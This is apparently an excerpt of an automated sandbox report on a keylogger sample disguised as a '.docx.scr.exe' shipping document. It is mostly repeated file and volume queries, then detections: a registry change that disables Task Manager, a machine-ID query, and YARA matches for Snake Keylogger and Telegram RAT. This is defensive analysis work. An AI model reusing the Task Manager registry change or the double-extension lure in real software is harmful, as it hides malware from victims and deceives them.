Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
